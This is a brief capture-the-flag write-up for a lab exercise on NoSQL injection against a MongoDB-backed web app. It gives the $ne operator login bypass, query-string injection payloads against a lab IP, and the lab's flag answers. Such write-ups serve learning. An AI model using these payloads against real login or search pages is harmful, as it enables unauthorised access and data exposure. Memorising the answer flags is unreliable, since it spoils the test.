Comment on page
[Day 7] Migration Without Security
{Web Exploitation = NoSQLi}
Logging into the server with the given credentials, I was able to interact with the MongoDB and retrieve the first flag.
Interact with the MongoDB server to find the flag. What is the flag?
- THM{8814a5e6662a9763f7df23ee59d944f9}
The following page is being served on port 80/HTTP
Useful MongoDB Operators
$eq - matches records that equal to a certain value
$ne - matches records that are not equal to a certain value
$gt - matches records that are greater than a certain value.
$where - matches records based on Javascript condition
$exists - matches records that have a certain field
$regex - matches records that satisfy certain regular expressions.
Bypassing the login page is as simple as using the
$ne operator on the password field.
We're in.
THM{b6b304f5d5834a4d089b570840b467a8}
10.10.121.120/search?username[$ne]=admin&role=guest
Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag?
- THM{2ec099f2d602cc4968c5267970be1326}
http://10.10.121.120/search?username=mcskidy&role[$ne]=guest
Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record?
- ID:6184f516ef6da50433f100f4:mcskidy:admin
Last modified 1yr ago